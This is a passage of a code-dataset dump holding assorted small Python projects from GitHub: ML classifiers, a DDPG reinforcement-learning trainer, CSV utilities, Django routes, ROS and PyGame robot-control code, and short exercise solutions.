pred[i]\n true = Y_test[i]\n if guess == true:\n count += 1\n\n error_sq = (guess-true)**2\n total_error += error_sq\n\n MSE = float(total_error / len(Y_test))\n\n print(\"\\nThe total number of review we are testing is:\", len(Y_test))\n print(\"The total number of correct predict using current KNN classifier is:\", count)\n print(\"The mean square error is:\", MSE)\n\n return knn\n\n\ndef predict_review(review, knn, dtree):\n \"\"\" This function takes in three arguements:\n 1) review, a string containing the text of a review\n 2) knn, a KNN classifier trained using our training data\n 3) dtree, a Decision tree Classifier trained using our training data\n\n In this function we want to predict star rating of the input review\n using both classifier inputed.\n\n This function does not return anything, but it report the predicted\n star rating using both classifier\n \"\"\"\n features = process_review(review)\n\n v = DictVectorizer(sparse = False)\n test = v.fit_transform(features)\n\n pred_knn = knn.predict(test)\n pred_dtree = dtree.predict(test)\n\n print(\"\\nGiven the review test:\\n\\n\", review)\n print(\"\\nThe star rating/catagory for this review predicted using our trained KNN Classifier is:\", pred_knn[0])\n print(\"\\nThe star rating/catagory for this review predicted using our trained Decision Tree Classifier is:\", pred_dtree[0])\n","repo_name":"ivyliu2019/CS35-Final-Project","sub_path":"Machine Learning/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3786727021","text":"# # Order program\r\n\r\nimport sys\r\nimport subprocess\r\n\r\nmsg = sys.argv[1]\r\n\r\nif msg == \"start\":\r\n # recv.pyを起動\r\n print(\"started\")\r\n subprocess.run(['test/bin/python3', 'working/recv.py'])\r\n\r\nelse:\r\n from socket import socket, AF_INET, SOCK_DGRAM\r\n HOST = ''\r\n PORT = 5000\r\n ADDRESS = \"127.0.0.1\"\r\n s = socket(AF_INET, SOCK_DGRAM)\r\n\r\n s.sendto(msg.encode(), (ADDRESS, PORT))\r\n\r\n msg, address = s.recvfrom(8192)\r\n msg = msg.decode()\r\n print(msg)\r\n\r\n s.close()\r\n","repo_name":"hakoshi-normal/gpt_chat_interface","sub_path":"gpt_server/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71973401041","text":"from __future__ import print_function\n\ndef read_csv_column_major(filename, return_type='dict'):\n with open(filename, 'r') as f:\n first_line = f.readline()\n col_name = first_line.split(',')\n for i in range(0, len(col_name)):\n col_name[i] = col_name[i].strip()\n col_num = len(col_name)\n \n if return_type == 'dict':\n cols = dict()\n for i in range(0, len(col_name)):\n cols[col_name[i]] = list() \n elif return_type == 'list':\n cols = [list() for i in range(0, col_num)]\n\n for line in f:\n entry = line.split(',')\n assert len(entry) == col_num\n if return_type == 'dict':\n for i in range(0, len(entry)):\n cols[col_name[i]].append(entry[i].strip())\n elif return_type == 'list':\n for i in range(0, len(entry)):\n cols[i].append(entry[i].strip())\n\n if return_type == 'dict':\n return cols\n elif return_type == 'list':\n return (col_name, cols)\n else:\n return None\n\ndef write_csv_column_major(col_name, cols, filename):\n with open(filename, 'w') as f:\n # first line\n f.write(col_name[0])\n for i in range(1, len(col_name)):\n f.write(',' + col_name[i])\n f.write('\\n')\n\n first_col = cols[0]\n col_num = len(cols)\n row_num = len(first_col)\n for i in range(0, row_num):\n f.write(first_col[i])\n for j in range(1, col_num):\n f.write(',' + cols[j][i])\n f.write('\\n')\n\ndef read_edges_as_set(filename):\n edges_set = set()\n with open(filename, 'r') as f:\n f.readline()\n for line in f:\n entry = line.strip().split(',')\n assert len(entry) == 2\n v1 = int(entry[0])\n v2 = int(entry[1])\n edges_set.add((min(v1, v2), max(v1, v2)))\n return edges_set\n\ndef write_training_file(training_edges_list, filename):\n with open(filename, 'w') as f:\n print('user1, user2', file=f)\n for e in training_edges_list:\n print(e[0], e[1], sep=',', file=f)\n return \n\ndef write_testing_file(testing_edges_list, test_filename, ans_filename):\n with open(test_filename, 'w') as test_f:\n with open(ans_filename, 'w') as ans_f:\n print('user1, user2', file=test_f)\n for e in testing_edges_list:\n print(e[0][0], e[0][1], sep=',', file=test_f)\n print(e[1], file=ans_f)\n return \n","repo_name":"barry800414/SNA_lecture","sub_path":"networkx/gen_pokec_data/file_io.py","file_name":"file_io.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26878943254","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nimport key_press as kp\n\ndef talker():\n pub = rospy.Publisher('chatter', String, queue_size=10)\n rospy.init_node('talker', anonymous=True)\n rate = rospy.Rate(10)\n while not rospy.is_shutdown():\n cmd_str = kp.fetch_command()\n rospy.loginfo(cmd_str)\n pub.publish(cmd_str)\n rate.sleep()\n\n\nif __name__ == '__main__':\n try:\n # initialize Keyboard Interface\n kp.init()\n talker()\n except rospy.ROSInterruptException:\n kp.stop()\n","repo_name":"swagatk/Raspi_codes","sub_path":"ROS/keyboard_teleop/kb_teleop.py","file_name":"kb_teleop.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18849664542","text":"def prime(n):\n if n==1:\n return False\n for i in range(2,int(n**0.5)+1):\n if n%i==0:\n return 0\n return 1\n \nx=int(input())\ny=int(input())\na=0\nwhile x<=y:\n if prime(x):\n a+=1\n x+=1\nprint(a)","repo_name":"Sk1458/codemind-python","sub_path":"Primes_in_range.py","file_name":"Primes_in_range.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12011039034","text":"from django.conf.urls.defaults import patterns, url, include\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\nfrom wintersession import views, api\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^enroll/$', RedirectView.as_view(url='/register/'), name='enroll'),\n url(r'^student/$', RedirectView.as_view(url='/register/'), name='student'),\n url(r'^courses/$', views.courses, name='courses'),\n url(r'^register/$', views.register, name='register'),\n url(r'^instructor/$', views.instructor, name='instructor'),\n url(r'^instructor/attendance$', views.instructor, name='attendance'),\n url(r'^student/drop/$', views.drop, name='drop'),\n url(r'^student/add/$', views.add, name='add'),\n url(r'^student/agenda/(?P.{1,8})/$', views.agenda, name='agenda'),\n url(r'^student/agenda/$', views.my_agenda, name='agenda'),\n url(r'^student/friend_agenda/$', views.friend_agenda, name='friend_agenda'),\n url(r'^teach/$', views.teach, name='teach'),\n url(r'^about/$', views.about, name='about'),\n url(r'^events/$', views.events, name='events'),\n url(r'^$', views.home, name='home'),\n\n url(r'^admin/$', views.admin, name='admin'),\n url(r'^admin/email$', views.admin_email, name='admin_email'),\n url(r'^admin/reschedule_check', views.admin_reschedule_check, name='admin_reschedule_check'),\n url(r'^admin/reschedule', views.admin_reschedule, name='admin_reschedule'),\n url(r'^admin$', RedirectView.as_view(url='/admin/')),\n (r'^djadmin/', include(admin.site.urls)),\n\n # login/logout\n url(r'^login/?$', 'django_cas.views.login', name='login'),\n url(r'^logout/?$', 'django_cas.views.logout', name='logout'),\n\n url(r'^api/', include(api.router.urls, namespace='api')),\n)\n","repo_name":"cakirmehmete/tigerapps","sub_path":"tigerapps/wintersession/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"41411915725","text":"\"\"\"\nWe have one external module pyinstaller which is used to convert .py to .exe in python programming.\n\nsyntax - pyninstaller pythonfile.py\n\nIt creates .exe file with all dependencies if we wish to get only one file so we can write this command\n\npyinstaller --oneline pythonfile.py \n\"\"\"\n\nfrom win32com.client import Dispatch\n\ndef text_to_speech_func(text):\n speaker = Dispatch(\"SAPI.SpVoice\")\n speaker.speak(text)\n\ntext = \"BAAR BAAR DIN AAYE BAAR BAAR DIL YE GAYE TUM JIYO HAZARO SAAL HAI MERI YE ARZOO HAPPY BIRTHDAY TO YOU NITIN HAPPY BIRTHDAY TO YOU NITIN HAPPY BIRTHDAY TO YOUUUUUUUUUUU\"\ntext_to_speech_func(text)","repo_name":"s1911nitin/PythonCourse","sub_path":"59_conversion_.pyto.exe.py","file_name":"59_conversion_.pyto.exe.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1255049657","text":"import tensorflow as tf\r\nfrom tensorflow.train import AdamOptimizer\r\nimport numpy as np\r\nimport random\r\nimport os\r\nfrom ENVS.AbstractEnv import AbsEnv\r\nfrom .model import AbsControlModel, AbsEvaluateModel\r\nfrom TOOLS.Logger import Logger\r\nfrom TOOLS.noises import OrnsteinUhlenbeckActionNoise\r\n\r\n\r\nclass DataBuffer(object):\r\n def __init__(self, obs_dim: int, act_dim: int, size: int):\r\n \"\"\"\r\n 数据缓存器的初始化\r\n\r\n :param obs_dim: int,\r\n 状态观测向量的长度\r\n :param act_dim: int,\r\n 行动向量的长度\r\n :param size: int,\r\n 数据缓存器的总容量\r\n \"\"\"\r\n # 存储当前的状态观测向量\r\n self.obs_t_buffer = np.zeros((size, obs_dim), dtype=np.float32)\r\n # 存储当前的行动向量\r\n self.act_t_buffer = np.zeros((size, act_dim), dtype=np.float32)\r\n # 存储当前的奖励信号值\r\n self.reward_t_buffer = np.zeros((size, ), dtype=np.float32)\r\n # 存储衍生的状态观测向量\r\n self.obs_n_buffer = np.zeros((size, obs_dim), dtype=np.float32)\r\n # 存储衍生的状态是否为终止状态\r\n self.done_n_buffer = np.zeros((size, ), dtype=np.float32)\r\n # 记录总数据条数的计数变量\r\n self.current_index = 0\r\n # 数据缓存器的大小\r\n self.size = size\r\n\r\n def store(self, obs_t: np.ndarray, act_t: np.ndarray, reward_t: float, obs_n: np.ndarray, done_n: bool) -> None:\r\n \"\"\"\r\n 决策器将观测到的一条数据记录写入到数据缓存器当中,这种写入会按照循环次序的方式进行\r\n\r\n :param obs_t: np.ndarray,\r\n 决策器决策时所面临的状态\r\n :param act_t: np.ndarray,\r\n 决策器基于当前所面临的状态所作出的决策--行动向量\r\n :param reward_t: float,\r\n 决策器观测到的环境对象执行动作向量之后所得到的奖励信号数值\r\n :param obs_n: np.ndarray,\r\n 决策器观测到的环境对象执行动作向量之后所得到的衍生状态观测向量\r\n :param done_n:\r\n 决策器观测到的环境对象执行动作向量之后所得到的衍生状态观测是否是终止状态\r\n :return: None\r\n 无返回值\r\n \"\"\"\r\n # 当前插入样本的对应索引\r\n item_current_index = self.current_index % self.size\r\n # 向数据缓存器中插入当前记录\r\n self.obs_t_buffer[item_current_index] = obs_t\r\n self.act_t_buffer[item_current_index] = act_t\r\n self.reward_t_buffer[item_current_index] = reward_t\r\n self.obs_n_buffer[item_current_index] = obs_n\r\n self.done_n_buffer[item_current_index] = done_n\r\n # 总数据计数器加1\r\n self.current_index += 1\r\n\r\n def get(self, sample_size: int) -> tuple:\r\n \"\"\"\r\n 从数据缓存器中抽取出特定数量的样本组\r\n\r\n :param sample_size: int,\r\n 抽取样本组的数量\r\n :return: tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray],\r\n 返回各个子容器特定索引下的样本组\r\n \"\"\"\r\n sample_index = random.sample(range(min(self.current_index, self.size)), sample_size)\r\n return self.obs_t_buffer[sample_index], self.act_t_buffer[sample_index], self.reward_t_buffer[sample_index], \\\r\n self.obs_n_buffer[sample_index], self.done_n_buffer[sample_index]\r\n\r\n def get_buffer_size(self) -> int:\r\n \"\"\"\r\n 获取当前数据缓存器中的有效样本数量\r\n\r\n :return: int,\r\n 返回当前数据缓存器中的有效样本数量\r\n \"\"\"\r\n return min(self.current_index, self.size)\r\n\r\n\r\nclass DDPG(object):\r\n def __init__(self, env: AbsEnv, policy_model: AbsControlModel, evaluate_model: AbsEvaluateModel, save_dir: str,\r\n exp_name: str, logger: Logger, gamma: float, eva_lr: float, pol_lr: float, rho: float,\r\n conti_act_low: np.ndarray, conti_act_high: np.ndarray, is_OU_noise: bool = False):\r\n \"\"\"\r\n 深度确定性策略梯度方法(DDPG)是一种适用于连续控制指令场景下的决策机,其特点是策略网络给出的是确定行动,而不是行动概率分布,其缺点\r\n 也是由于这个原因,策略网络本身没有办法进行探索,所以在训练过程中需要在策略网络输出结果上添加噪音。\r\n\r\n :param env: AbsEnv,\r\n 与DDPG决策器进行交互的环境对象,这里使用的环境对象需要满足AbsEnv的接口规范\r\n :param policy_model: AbsControlModel,\r\n 策略网络对象\r\n :param evaluate_model: AbsEvaluateModel,\r\n 估值网络对象\r\n :param save_dir: str,\r\n 策略网络对象和估值网络对象模型参数存储文件地址\r\n :param exp_name: str,\r\n 本次试验的名称\r\n :param logger: Logger,\r\n 日志对象\r\n :param gamma: float,\r\n 远期奖励的折现系数\r\n :param eva_lr: float,\r\n 估值网络的学习速率\r\n :param pol_lr: float,\r\n 策略网络的学习速率\r\n :param rho: float,\r\n 目标网络向主网络靠近的速率\r\n :param conti_act_low: np.ndarray,\r\n 连续运动指令的下限\r\n :param conti_act_high: np.ndarray,\r\n 连续运动指令的上限\r\n :param is_OU_noise: bool,\r\n 控制过程中的随机噪音是否引入OU噪音\r\n \"\"\"\r\n # 与决策器进行交互的环境对象\r\n self.env = env\r\n # 策略网络模型\r\n self.policy_model = policy_model\r\n # 估值网络模型\r\n self.evaluate_model = evaluate_model\r\n # 远期奖励的折现系数\r\n self.gamma = gamma\r\n # 估值网络的学习率\r\n self.evaluate_lr = eva_lr\r\n # 策略网络的学习率\r\n self.policy_lr = pol_lr\r\n # 目标网络向主网络的靠近速率\r\n self.rho = rho\r\n # 日志文件对象\r\n self.logger = logger\r\n # 模型参数存储文件夹\r\n self.target_dir_path = os.path.join(save_dir, exp_name)\r\n if not os.path.exists(self.target_dir_path):\r\n os.mkdir(self.target_dir_path)\r\n # 模型参数存储文件名称\r\n self.target_file_name = os.path.join(self.target_dir_path, 'DDPG_Model.ckpt')\r\n # 连续动作指令的上限和下限\r\n self.conti_act_low = conti_act_low\r\n self.conti_act_high = conti_act_high\r\n # 控制学习过程中是否引入OU噪音\r\n self.is_OU_noise = is_OU_noise\r\n\r\n self.ph_reward, self.ph_done, self.ph_obs_new, self.ph_obs, self.ph_act, self.policy, self.target_policy,\\\r\n self.evaluate_act, self.evaluate_policy, self.target_evaluate_policy, self.evaluate_loss, self.train_evaluate, \\\r\n self.policy_loss, self.train_policy, self.update_target_params, self.init_target_params = self.build_model()\r\n\r\n def build_model(self) -> list:\r\n \"\"\"\r\n 定义一个TensorFlow计算图\r\n\r\n :return: tuple,\r\n 返回一组用于DDPG更新的占位符和计算节点\r\n \"\"\"\r\n # ++++++++++++++++++ 占位符 ++++++++++++++++\r\n ph_reward = tf.placeholder(dtype=tf.float32, shape=(None, ), name='Reward_PH')\r\n ph_done = tf.placeholder(dtype=tf.float32, shape=(None, ), name='Done_PH')\r\n ph_obs_new = tf.placeholder(dtype=tf.float32, shape=(None, self.env.obs_dim), name='Obs_New_PH')\r\n ph_obs = tf.placeholder(dtype=tf.float32, shape=(None, self.env.obs_dim), name='Obs_PH')\r\n ph_act = tf.placeholder(dtype=tf.float32, shape=(None, self.env.act_dim), name='Act_PH')\r\n # ++++++++++++++++++ 占位符 ++++++++++++++++\r\n # +++++++++++++++++ 模型定义 ++++++++++++++++\r\n main_policy_name = 'MainPolicy'\r\n main_evaluate_name = 'MainEvaluate'\r\n target_policy_name = 'TargetPolicy'\r\n target_evaluate_name = 'TargetEvaluate'\r\n with tf.variable_scope(main_policy_name):\r\n policy = self.policy_model.build_model(ph_obs, self.conti_act_high)\r\n with tf.variable_scope(target_policy_name):\r\n target_policy = self.policy_model.build_model(ph_obs_new, self.conti_act_high)\r\n with tf.variable_scope(main_evaluate_name):\r\n evaluate_act, evaluate_policy = self.evaluate_model.build_model(ph_obs, ph_act, policy)\r\n with tf.variable_scope(target_evaluate_name):\r\n _, target_evaluate_policy = self.evaluate_model.build_model(ph_obs_new, ph_act, target_policy)\r\n # 主策略网络的全体参数\r\n policy_params = [i for i in tf.global_variables() if main_policy_name in i.name]\r\n evaluate_params = [i for i in tf.global_variables() if main_evaluate_name in i.name]\r\n target_policy_params = [i for i in tf.global_variables() if target_policy_name in i.name]\r\n target_evaluate_params = [i for i in tf.global_variables() if target_evaluate_name in i.name]\r\n # +++++++++++++++++ 模型定义 ++++++++++++++++\r\n # +++++++++++++++++ 算法 ++++++++++++++++\r\n # 混合了真实奖励信号的部分准确回报\r\n real_repay = ph_reward + self.gamma * (1 - ph_done) * target_evaluate_policy\r\n # 梯度下降在这一个分项上需要进行截断\r\n real_repay = tf.stop_gradient(real_repay)\r\n # 估值网络损失函数\r\n evaluate_loss = tf.reduce_mean(tf.square(evaluate_act - real_repay))\r\n train_evaluate = AdamOptimizer(learning_rate=self.evaluate_lr).minimize(evaluate_loss, var_list=evaluate_params)\r\n # 策略网络损失函数\r\n policy_loss = - tf.reduce_mean(evaluate_policy)\r\n train_policy = AdamOptimizer(learning_rate=self.policy_lr).minimize(policy_loss, var_list=policy_params)\r\n # 更新目标网络参数\r\n update_target_policy_params = tf.group([tf.assign(param_targ, self.rho * param_main + (1-self.rho) * param_targ)\r\n for param_main, param_targ in zip(policy_params, target_policy_params)])\r\n update_target_evaluate_params = tf.group([tf.assign(param_targ, self.rho * param_main + (1-self.rho) * param_targ)\r\n for param_main, param_targ in zip(evaluate_params,\r\n target_evaluate_params)])\r\n update_target_params = tf.group([update_target_policy_params, update_target_evaluate_params])\r\n # 初始化目标网络的参数等于主网络的参数\r\n init_target_policy_params = tf.group([tf.assign(param_targ, param_main)\r\n for param_main, param_targ in zip(policy_params, target_policy_params)])\r\n init_target_evaluate_params = tf.group([tf.assign(param_targ, param_main)\r\n for param_main, param_targ in zip(evaluate_params,\r\n target_evaluate_params)])\r\n init_target_params = tf.group([init_target_policy_params, init_target_evaluate_params])\r\n # +++++++++++++++++ 算法 ++++++++++++++++\r\n return [ph_reward, ph_done, ph_obs_new, ph_obs, ph_act, policy, target_policy, evaluate_act,\r\n evaluate_policy, target_evaluate_policy, evaluate_loss, train_evaluate, policy_loss,\r\n train_policy, update_target_params, init_target_params]\r\n\r\n def train(self, buffer_size: int = 1000000, retrain_label: bool = False, learn_epochs: int = 150,\r\n max_iter_per_epoch: int = 4000, sample_size: int = 200, save_freq: int = 10, noise_scale: float = 0.1,\r\n start_steps: int = 10000, update_after: int = 1000, update_every: int = 50, render: bool = False):\r\n # 创建计算资源会话\r\n sess = tf.Session()\r\n # 创建模型存储对象\r\n model_saver = tf.train.Saver(max_to_keep=5)\r\n # 创建数据缓存器\r\n data_buffer = DataBuffer(self.env.obs_dim, self.env.act_dim, buffer_size)\r\n # 如果是重新进行训练的话,就读取历史参数记录\r\n if retrain_label:\r\n model_saver.restore(sess, tf.train.latest_checkpoint(self.target_dir_path))\r\n # 否则的话,就初始化计算资源会话中的各个变量\r\n else:\r\n sess.run(tf.global_variables_initializer())\r\n # 同时将目标网络的参数初始化为主网络中的参数\r\n _ = sess.run(self.init_target_params)\r\n # 开始进行测试和训练\r\n def get_action(obs_t, noise_scale):\r\n act = sess.run(self.policy, feed_dict={self.ph_obs: obs_t.reshape(1, -1)})\r\n # 目前只有一个状态观测向量,所以只衍生出一个行动向量\r\n act = act[0]\r\n # 在行动向量上添加随机噪音\r\n if not self.is_OU_noise:\r\n act += noise_scale * np.random.randn(self.env.act_dim)\r\n else:\r\n act += OU_noise()\r\n return np.clip(act, self.conti_act_low, self.conti_act_high)\r\n # 总决策次数等于单回合最大决策次数乘以学习回合总数\r\n total_steps = max_iter_per_epoch * learn_epochs\r\n obs_t, ep_repay, ep_len = self.env.reset(), 0, 0\r\n if self.is_OU_noise:\r\n OU_noise = OrnsteinUhlenbeckActionNoise(np.zeros(self.env.act_dim, ), sigma=0.75)\r\n k = 1\r\n for t in range(total_steps):\r\n if render:\r\n try:\r\n self.env.render()\r\n except Exception as e:\r\n pass\r\n\r\n if t > start_steps:\r\n act = get_action(obs_t, noise_scale)\r\n else:\r\n if not self.is_OU_noise:\r\n act = self.conti_act_high * (np.random.rand(self.env.act_dim) * 2 - 1)\r\n else:\r\n act = OU_noise()\r\n reward, obs_n, done, _ = self.env.step(act)\r\n ep_repay += reward\r\n ep_len += 1\r\n done = False if ep_len == max_iter_per_epoch else done\r\n data_buffer.store(obs_t, act, reward, obs_n, done)\r\n obs_t = obs_n\r\n\r\n if done or (ep_len == max_iter_per_epoch):\r\n self.logger.to_log('[%d]控制回合结束!总得分为:%.2f' % (k, ep_repay))\r\n obs_t, ep_repay, ep_len = self.env.reset(), 0, 0\r\n k += 1\r\n # OU噪音重置为初始状态\r\n OU_noise.reset()\r\n\r\n if t >= update_after and t % update_every == 0:\r\n evaluate_loss_list = []\r\n policy_loss_list = []\r\n for _ in range(update_every):\r\n obs_t_buf, act_t_buf, rew_t_buf, obs_n_buf, done_buf = data_buffer.get(sample_size)\r\n feed_dict = {self.ph_obs: obs_t_buf, self.ph_act: act_t_buf, self.ph_reward: rew_t_buf,\r\n self.ph_obs_new: obs_n_buf, self.ph_done: done_buf}\r\n evaluate_outs = sess.run([self.evaluate_loss, self.train_evaluate], feed_dict=feed_dict)\r\n policy_outs = sess.run([self.policy_loss, self.train_policy], feed_dict=feed_dict)\r\n if np.random.rand() < 0.3:\r\n sess.run(self.update_target_params)\r\n evaluate_loss_list.append(evaluate_outs[0])\r\n policy_loss_list.append(policy_outs[0])\r\n mean_evaluate_loss = np.mean(evaluate_loss_list)\r\n mean_policy_loss = np.mean(policy_loss_list)\r\n if t % 4000 == 0:\r\n self.logger.to_log('估值网络上的损失为:%.6f' % mean_evaluate_loss)\r\n self.logger.to_log('策略网络上的得分为:%.6f' % (-mean_policy_loss))\r\n if t % save_freq == 0:\r\n model_saver.save(sess, self.target_file_name, global_step=t)\r\n\r\n # 关闭计算资源\r\n sess.close()\r\n\r\n def test(self, test_epochs, max_iter_per_epoch):\r\n import time\r\n # 创建计算资源会话\r\n sess = tf.Session()\r\n # 创建模型存储对象\r\n model_saver = tf.train.Saver()\r\n # 向计算资源会话中恢复模型参数\r\n model_saver.restore(sess, tf.train.latest_checkpoint(self.target_dir_path))\r\n\r\n for epoch in range(test_epochs):\r\n self.logger.to_log('+++++++ Excuting - [%d] +++++++' % epoch)\r\n obs_t = self.env.reset()\r\n ep_repay = 0\r\n for k in range(max_iter_per_epoch):\r\n try:\r\n self.env.render()\r\n time.sleep(0.02)\r\n except Exception:\r\n pass\r\n\r\n act_t = sess.run(self.policy, feed_dict={self.ph_obs: obs_t.reshape(1, -1)})\r\n reward_t, obs_t, done, _ = self.env.step(act_t[0])\r\n ep_repay += reward_t\r\n if done or k == max_iter_per_epoch - 1:\r\n self.logger.to_log('控制回合结束,总得分为:%.2f' % ep_repay)\r\n ep_repay = 0\r\n break\r\n\r\n","repo_name":"xiaojianyang820/StandardRL","sub_path":"DDPG/algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":17408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23581772589","text":"N = int(input())\n\nfor _ in range(N):\n ps = list(input())\n stack = []\n empty_stack = False\n \n for i in range(len(ps)):\n if ps[i] == \"(\":\n stack.append(ps[i])\n else:\n if not stack:\n empty_stack = True\n break\n else:\n stack.pop()\n \n if not stack and not empty_stack:\n print(\"YES\")\n else:\n print(\"NO\")","repo_name":"Otwooo/Study_Algorithm","sub_path":"baekjoon/자료 구조/[9012]괄호.py","file_name":"[9012]괄호.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26413616368","text":"def fac(n):\n product = 1\n for i in range(n):\n product = product * (i+1)\n return product\n\nprint(fac(5))\n\nprint(fac(4))\n\na = fac(3)\nprint(a)\n\n\n\n\ndef factRec(n):\n if n==1 or n==0:\n return 1\n return n * factRec(n-1)\n\n\nf = factRec(4)\nprint(f)","repo_name":"mdahtisham/Python","sub_path":"Chapter 8/chap8pro5.py","file_name":"chap8pro5.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34361038534","text":"class Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n A,B = nums1, nums2\n total = len(nums1) + len(nums2)\n half = total // 2\n\n #ensure that A is always the minimum array\n if len(B) < len(A):\n A,B = B,A\n\n l,r = 0, len(A) - 1\n while True:\n i = (l + r) // 2 #index for A\n j = half - i - 2 #j is the index for B. -2 to account for 0 index\n\n Aleft = A[i] if i >= 0 else float(\"-infinity\")\n Aright = A[i + 1] if (i + 1) < len(A) else float(\"infinity\")\n Bleft = B[j] if j >= 0 else float(\"-infinity\")\n Bright = B[j + 1] if (j + 1) < len(B) else float (\"infinity\")\n\n #partition is correct\n if Aleft <= Bright and Bleft <= Aright:\n #odd\n if total % 2 != 0:\n return min(Aright, Bright)\n else:\n return (max(Aleft, Bleft) + min(Aright, Bright)) / 2\n elif Aleft > Bright:\n r = i - 1\n else:\n l = i + 1\n ","repo_name":"Devica2000/leetcode-submissions","sub_path":"0004-median-of-two-sorted-arrays/0004-median-of-two-sorted-arrays.py","file_name":"0004-median-of-two-sorted-arrays.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15317360913","text":"from __future__ import absolute_import\n\n__docformat__ = \"restructuredtext en\"\n\nimport os\nimport sys\nimport time\nimport logging\nimport pygame\nimport six\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(\n os.path.abspath(__file__))))\nsys.path.append(BASE_DIR)\n\nfrom tborg import(\n create_working_dir, ConfigLogger, ThunderBorg, ThunderBorgException)\nfrom tborg.utils.daemon import Daemon\n\ncreate_working_dir()\n\nfrom tborg import BORG_CUBE, LOG_PATH, RUN_PATH\n\n\nclass PYGameController(object):\n \"\"\"\n Initializes the attached controller.\n \"\"\"\n _DEFAULT_CTRL_WAIT = 0.1\n _DEFAULT_EVENT_WAIT = 0.0\n\n def __init__(self, logger_name='', log_level=logging.INFO, debug=False):\n \"\"\"\n Initialize logging and sets the two wait times to a reasonable\n default.\n \"\"\"\n self._debug = debug\n self._clog = logging.getLogger(logger_name)\n self._clog.setLevel(log_level)\n self.__controller_initialized = False\n self.__ctrl_wait_time = 0\n self.ctrl_wait_time = self._DEFAULT_CTRL_WAIT\n self.event_wait_time = self._DEFAULT_EVENT_WAIT\n self._quit = False\n\n @property\n def ctrl_wait_time(self):\n \"\"\"\n Property that gets or sets the controller wait time. This wait\n time is used when looping during the controller detection period.\n\n :param sleep: The period of time to sleep between checks. Defaults\n to 0.1 seconds.\n :type sleep: float\n \"\"\"\n return self.__ctrl_wait_time\n\n @ctrl_wait_time.setter\n def ctrl_wait_time(self, sleep):\n self.__ctrl_wait_time = sleep\n\n @property\n def event_wait_time(self):\n \"\"\"\n Property that gets or sets the event wait time. This wait time is\n used when looping during the event processing period.\n\n :param sleep: The period of time to sleep between event\n processing. Defaults to 0.0 seconds.\n :type sleep: float\n \"\"\"\n return self.__event_wait_time\n\n @event_wait_time.setter\n def event_wait_time(self, sleep):\n self.__event_wait_time = sleep\n\n @property\n def is_ctrl_init(self):\n \"\"\"\n A property that returns `True` or `False` if the controller is\n initialized.\n \"\"\"\n return self.__controller_initialized\n\n def init_controller(self):\n \"\"\"\n Wait until the controller is connected then initialize pygame.\n \"\"\"\n pygame.init()\n\n while True:\n try:\n pygame.joystick.init()\n except pygame.error as e:\n self._clog.error(\"PYGame error: %s\", e)\n if self._quit_sleep(): break\n except KeyboardInterrupt:\n self._clog.warn(\"User aborted with CTRL C.\")\n break\n else:\n if pygame.joystick.get_count() < 1:\n if self._quit_sleep(): break\n else:\n self.joystick = pygame.joystick.Joystick(0)\n self.joystick.init()\n self._initialize_variables()\n self._clog.info(\"Found controller.\")\n self.__controller_initialized = True\n break\n\n def _quit_sleep(self):\n error = False\n\n try:\n pygame.joystick.quit()\n time.sleep(self.ctrl_wait_time)\n except KeyboardInterrupt:\n self._clog.warn(\"User aborted with CTRL C.\")\n error = True\n\n return error\n\n def _initialize_variables(self):\n self.axis_data = {\n axis: 0.0 for axis in range(self.joystick.get_numaxes())\n }\n self.ball_data = {\n ball: 0.0 for ball in range(self.joystick.get_numballs())\n }\n self.button_data = {\n but: False for but in range(self.joystick.get_numbuttons())\n }\n self.hat_data = {\n hat: (0, 0) for hat in range(self.joystick.get_numhats())\n }\n # Buttons Event Types\n self.SQUARE = 0\n self.CROSS = 1\n self.CIRCLE = 2\n self.TRIANGLE = 3\n self.L1 = 4\n self.R1 = 5\n self.L2 = 6\n self.R2 = 7\n self.SHARE = 8\n self.OPTIONS = 9\n self.LJB = 10\n self.RJB = 11\n self.PSB = 12\n self.PADB = 13\n\n # Axis Event Types\n self.LF_LR = 0\n self.LF_UD = 1\n self.L2_VR = 2\n self.RT_LR = 3\n self.RT_UD = 4 # if self.is_ps4() else 3\n self.R2_VR = 5\n\n # Create HAT variables. Hat Event Types (HAT0, HAT1, ...)\n for i in range(len(self.hat_data)):\n setattr(self, 'HAT' + i, i)\n\n def __set_axis(self, event):\n self.axis_data[event.axis] = round(event.value, 3)\n\n def __set_ball(self, event):\n self.ball_data[event.ball] = event.rel\n\n def __set_button_down(self, event):\n self.button_data[event.button] = True\n\n def __set_button_up(self, event):\n self.button_data[event.button] = False\n\n def __set_hat(self, event):\n self.hat_data[event.hat] = event.value\n\n def set_quit(self, event=None):\n 